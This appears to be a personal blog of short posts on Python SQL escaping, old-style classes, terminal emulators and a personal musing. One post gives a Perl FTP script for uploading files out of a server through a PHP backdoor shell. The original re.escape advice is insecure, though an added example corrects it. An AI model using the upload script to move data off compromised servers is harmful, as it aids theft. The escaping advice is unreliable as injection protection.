re.escape(): Python’s equivalent of PHP’s addslashes()

PHP has a very handy function, addslashes, which escapes, by prefixing backslashes, characters that can cause undesired effects in SQL queries (read: SQL injection). Coding a login page in Python had me hard pressed to find something similar in Python to escape characters retrieved from login forms. I won’t say I searched across the seven seas, but as much as I looked, I discovered the “escape” function from the “re” module. I cannot find a reference online (I need to search better and more thoroughly), but re.escape in effect escapes all non-alphanumeric characters in the string given to it as an argument.

The __doc__ string for re.escape says:

escape(pattern)
    Escape all non-alphanumeric characters in pattern.
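
An added example, not from the original post: it compares a login lookup whose SQL text is built by hand after re.escape() with one that passes the value as a bound DB-API parameter, which needs no escaping at all. The in-memory SQLite table, the user names and the function names are constructed for illustration; note that since Python 3.7 re.escape() escapes only regex-special characters, so quotes pass through unchanged.

```python
import re
import sqlite3


def make_db():
    """In-memory table with constructed sample users."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT PRIMARY KEY)")
    db.executemany("INSERT INTO users VALUES (?)",
                   [("alice",), ("j.doe",), ("O'Brien",)])
    return db


def lookup_escaped(db, name):
    """Build the SQL text by hand after re.escape(); returns a status string."""
    sql = "SELECT 1 FROM users WHERE name = '%s'" % re.escape(name)
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.OperationalError:
        # The quote in the data ended the SQL string literal early, so the
        # rest of the value was parsed as SQL and the statement is invalid.
        return "sql error"
    # Regex escaping inserts backslashes (j.doe -> j\.doe). SQL string
    # literals do not treat backslash as an escape, so the value is altered.
    return "found" if row else "missing"


def lookup_bound(db, name):
    """Pass the value as a bound parameter; it is never parsed as SQL."""
    row = db.execute("SELECT 1 FROM users WHERE name = ?", (name,)).fetchone()
    return row is not None


if __name__ == "__main__":
    db = make_db()
    for name in ("alice", "j.doe", "O'Brien"):
        print("%-8s escaped=%-9s bound=%s" % (
            name, lookup_escaped(db, name), lookup_bound(db, name)))
```

The hand-built query only works for purely alphanumeric names; the bound-parameter query finds all three users.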


Python Classes: Old-style vs New-style

I ran into a bit of a problem, trying to use the new-style class syntax while calling a class that apparently only supports the old-class style syntax (thanks due to Brend on #python at irc.freenode.net for pointing that out). Look closely at the call to super() in the following code:

#!/usr/bin/python
# -*- set tabstop=4 -*-

import cgi

class CGIWrapper(cgi.FieldStorage):
    def __init__(self):
        super(CGIWrapper, self).__init__()

if __name__ == "__main__":
    c = CGIWrapper()

---------Error----------------
Traceback (most recent call last):
 File "yoyo.py", line 17, in ?
  c = CGIWrapper()
 File "yoyo.py", line 9, in __init__
  super(CGIWrapper, self).__init__()
TypeError: super() argument 1 must be type, not classobj

The workaround, naturally, is to call cgi.FieldStorage using the old-class style way.


class CGIWrapper(cgi.FieldStorage):
    def __init__(self):
        cgi.FieldStorage.__init__(self)

Backdoor PHP Shells and a small script to upload files.

Backdoor PHP shells are receiving a lot of attention from script kiddies. In case you don’t know what PHP backdoor shells do: they provide a web-based interface to execute shell commands on systems on which they have been maliciously set up.

A friend once asked me to write him a script to upload files from a server via the PHP shell interface to some anonymous FTP server. I wrote the following minimalist Perl script.

use Net::FTP;

my $host = '';
my $port = 21;
my $user = '';
my $pass = '';

my $file = shift || die "usage: $0 file";

my $ftp = Net::FTP->new($host) or die "failed.$!";
$ftp->login($user, $pass);
$ftp->binary();
$ftp->put($file);
$ftp->quit();

I am making it available here for I don’t know what reason.

aterm, xterm, Eterm, rxvt, Konsole, oh my!

“Konsole” supports transparency, but it is slow (and most importantly for me, does not have the “fixed” fonts that xterm uses). “xterm” is cool, but I want transparency which it doesn’t have. “Eterm” is, again, slower than “xterm”, and though it does support backgrounds, you cannot, as far as I have explored it, make “Eterm” use any image for background. On the flip side, “Eterm” has support for the fixed fonts like xterm. But I desperately need “transparency”.

Look at “aterm”. Although working on the shoulders of “rxvt”, “aterm” is pretty much like “xterm”, supports all the things “xterm” does, and provides fast visually pleasing effects (without hogging up resources like Konsole), including, what I want the most, transparency. Not only that, you can configure “aterm” to use fixed font. What more do I want?

If you have aterm installed, invoke it with the following arguments:

aterm -tr -trsb -cr red +sb -fg gray -fn fixed -fb fixed

Abstinence (Random Musings #21)

I have an overly sensitive stomach and digestive system. I really should refrain from eating most things that aren’t cooked at home. I know what happens when I do it, yet I persist, and wake up the next morning with an upset stomach and a foul mood. Sigh.